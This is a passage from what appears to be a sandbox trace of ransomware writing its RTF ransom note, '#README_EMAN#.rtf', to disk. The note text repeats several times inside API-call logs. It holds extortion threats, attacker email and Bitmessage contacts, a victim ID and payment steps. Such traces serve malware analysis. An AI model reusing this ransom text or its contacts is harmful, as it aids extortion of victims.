\\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nEwJVUzEVMBMGA1UEChMMRGl\x93/", lpUsedDefaultChar=0x0) returned 8717 [0298.796] WriteFile (in: hFile=0x27c, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.796] CloseHandle (hObject=0x27c) returned 1 [0298.796] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en\\#readme_eman#.rtf")) returned 0xffffffff [0298.796] GetLastError () returned 0x2 [0298.796] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.798] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.798] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.798] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 